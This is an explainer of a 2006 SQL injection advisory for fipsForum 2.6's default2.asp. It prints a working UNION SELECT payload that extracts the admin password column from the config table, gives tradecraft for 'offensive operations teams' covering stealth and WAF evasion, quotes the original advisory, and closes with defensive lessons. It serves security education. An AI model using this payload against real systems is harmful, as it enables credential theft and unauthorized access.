fipsForum 2.6 'default2.asp' SQL Injection: A Didactic Explainer

What this paper is

This paper describes a remote SQL injection vulnerability found in fipsForum version 2.6. The vulnerability exists within the default2.asp file, which is part of the web application. By manipulating the kat parameter in the URL, an attacker can inject malicious SQL queries. This allows for unauthorized data retrieval from the application's database.

Simple technical breakdown

Web applications often use databases to store information. When a user interacts with a web page, the application might construct a database query based on the user's input. If the application doesn't properly sanitize or validate this input, an attacker can insert special characters and commands that change the intended database query. This is SQL injection.

In this specific case, the default2.asp page in fipsForum 2.6 takes a value from the kat URL parameter. This value is directly used in an SQL query. The vulnerability allows an attacker to use the UNION SELECT SQL statement to combine their malicious query with the original query, effectively extracting data from other tables in the database.

Complete code and payload walkthrough

The provided paper is very concise and does not contain executable code or shellcode in the traditional sense. Instead, it provides a URL structure and an example of a malicious query.

• URL Structure: http://[target]/[path]//default2.asp?kat=[SQL]

  • [target]: This represents the IP address or hostname of the vulnerable fipsForum installation.
  • [path]: This is the directory path where fipsForum is installed on the web server.
  • default2.asp: This is the vulnerable ASP (Active Server Pages) script.
  • kat=[SQL]: This is the parameter that is vulnerable to SQL injection. The value provided for kat is directly incorporated into an SQL query.

• Example Malicious Query: kat=-1%20union%20select%200,pw_admin%20from%20config

  • %20: This is the URL-encoded representation of a space character. Spaces are crucial for separating SQL keywords and identifiers.
  • -1: This is likely used to ensure the original query's condition (if any) evaluates to false, making the UNION SELECT part the dominant result. The exact original query is not provided, but this is a common technique.
  • union select 0,pw_admin from config: This is the core of the injected SQL.
    • UNION SELECT: This SQL operator combines the result set of two or more SELECT statements.
    • 0: This is a placeholder value. The number of columns in the UNION SELECT statement must match the number of columns in the original query. The 0 is used to satisfy this requirement for one of the columns.
    • pw_admin: This is the name of a column that the attacker wants to retrieve. Based on the name, it likely contains administrator passwords.
    • from config: This specifies the table from which to retrieve the pw_admin column. The config table is a common place for application settings and credentials.

Mapping:

• http://[target]/[path]//default2.asp?kat= -> Vulnerable endpoint and parameter for injection.
• -1 -> Condition to bypass original query logic.
• %20 -> URL-encoded space, essential for SQL syntax.
• union select 0,pw_admin -> Injected SQL command to combine results and select the pw_admin column.
• from config -> Target table for data extraction.

Unknowns:

• The exact original SQL query executed by default2.asp is not provided. This makes it difficult to definitively determine the number of columns the original query returns, though the example implies it returns at least two.
• The specific structure and contents of the config table are unknown.

Practical details for offensive operations teams

• Required Access Level: Low. This is a remote, unauthenticated vulnerability accessible via HTTP.
• Lab Preconditions:
  • A target system running fipsForum version 2.6 or earlier.
  • Network connectivity to the target web server.
  • A web browser or an HTTP request tool (like curl or Burp Suite) capable of sending GET requests with URL parameters.
  • Knowledge of the target's IP address/hostname and the path to the fipsForum installation.
• Tooling Assumptions:
  • Standard web browsers.
  • HTTP proxy tools (e.g., Burp Suite, OWASP ZAP) for intercepting and modifying requests.
  • SQL injection specific tools (e.g., sqlmap) could potentially automate this, but manual crafting is straightforward.
• Execution Pitfalls:
  • URL Encoding: Incorrect URL encoding of special characters (like spaces) will cause the injection to fail.
  • Firewalls/WAFs: Modern Web Application Firewalls (WAFs) might detect and block common SQL injection patterns like UNION SELECT. Obfuscation techniques might be necessary.
  • Application Logic: If the kat parameter is used in a way that doesn't directly translate to an SQL query (e.g., it's first processed by server-side code that sanitizes it), the injection might fail.
  • Database Errors: If the database returns errors that are displayed to the user, these can provide clues about the injection's success or failure. However, well-configured applications often suppress database errors.
  • Column Mismatch: If the number of columns in the UNION SELECT statement does not match the number of columns in the original query, the injection will fail. The example uses 0 and pw_admin, implying at least two columns. If the original query returns more columns, additional placeholder values (e.g., 0, 0, pw_admin) would be needed.
• Tradecraft Considerations:
  • Reconnaissance: Identifying the fipsForum version is crucial. If it's a newer version, this specific vulnerability won't apply.
  • Stealth: Avoid overly aggressive scanning that might trigger alerts. Start with simple, targeted requests.
  • Payload Development: The example focuses on retrieving pw_admin. For a full engagement, an operator would need to enumerate other tables and columns to extract more valuable information (user lists, other credentials, sensitive data). This often involves blind SQL injection techniques if direct error messages are not available.
  • Data Exfiltration: The retrieved data (pw_admin) needs to be exfiltrated. This is typically done by observing the response from the web server.

Where this was used and when

• Context: This vulnerability was found in fipsForum, a forum software application.
• Approximate Year: Published in 2006. Exploitation would have occurred around this time or shortly after. This type of vulnerability was common in web applications during the mid-2000s.

Defensive lessons for modern teams

• Input Validation and Sanitization: This is the cornerstone of preventing SQL injection. All user-supplied input, especially that used in database queries, must be rigorously validated and sanitized.
  • Parameterized Queries/Prepared Statements: Use these whenever interacting with a database. They separate SQL code from data, preventing user input from being interpreted as commands.
  • Whitelisting: Only allow known-good characters or patterns for input.
  • Blacklisting (less effective): Avoid relying solely on blacklisting potentially malicious characters, as attackers can often find ways around them.
• Least Privilege: Database accounts used by web applications should have only the minimum necessary permissions. An account that only needs to read specific tables shouldn't have write or administrative privileges.
• Web Application Firewalls (WAFs): While not a silver bullet, WAFs can provide an additional layer of defense by detecting and blocking known attack patterns. However, they should not be the primary defense.
• Regular Patching and Updates: Keep all web applications and their components updated to the latest secure versions. Vulnerabilities like this are often patched in newer releases.
• Error Handling: Configure web applications and databases to avoid revealing detailed error messages to end-users, as these can aid attackers in identifying vulnerabilities.

ASCII visual (if applicable)

This vulnerability is a direct manipulation of a web request to a server-side script. An ASCII visual can illustrate the flow of data.

+-----------------+      +-----------------+      +-----------------+
| Attacker's      |----->| Web Browser/    |----->| Target Web      |
| Machine         |      | HTTP Client     |      | Server          |
+-----------------+      +-----------------+      +-------+---------+
                                                          |
                                                          | Request with
                                                          | injected SQL
                                                          v
                                                 +--------+--------+
                                                 | default2.asp    |
                                                 | (Vulnerable)    |
                                                 +--------+--------+
                                                          |
                                                          | Constructs
                                                          | SQL Query
                                                          v
                                                 +--------+--------+
                                                 | Database Server |
                                                 +-----------------+
                                                          |
                                                          | Returns Data
                                                          | (e.g., pw_admin)
                                                          v
                                                 +--------+--------+
                                                 | Target Web      |
                                                 | Server          |
                                                 +--------+--------+
                                                          |
                                                          | Response with
                                                          | extracted data
                                                          v
+-----------------+      +-----------------+      +--------+--------+
| Attacker's      |<-----| Web Browser/    |<-----| Web Server      |
| Machine         |      | HTTP Client     |      | Response        |
+-----------------+      +-----------------+      +-----------------+

Source references

• Paper: fipsForum 2.6 - 'default2.asp' SQL Injection
• Author: ajann
• Published: 2006-11-22
• Exploit-DB URL: https://www.exploit-db.com/papers/2830
• Raw Exploit URL: https://www.exploit-db.com/raw/2830

Original Exploit-DB Content (Verbatim)

*******************************************************************************
# Title   :  fipsForum <= v2.6 (default2.asp) Remote SQL Injection Vulnerability
# Author  :   ajann
# Contact :   :(

*******************************************************************************


###http://[target]/[path]//default2.asp?kat=[SQL]

Example:

//default2.asp?kat=-1%20union%20select%200,pw_admin%20from%20config


"""""""""""""""""""""
# ajann,Turkey
# ...

# Im not Hacker!

# milw0rm.com [2006-11-22]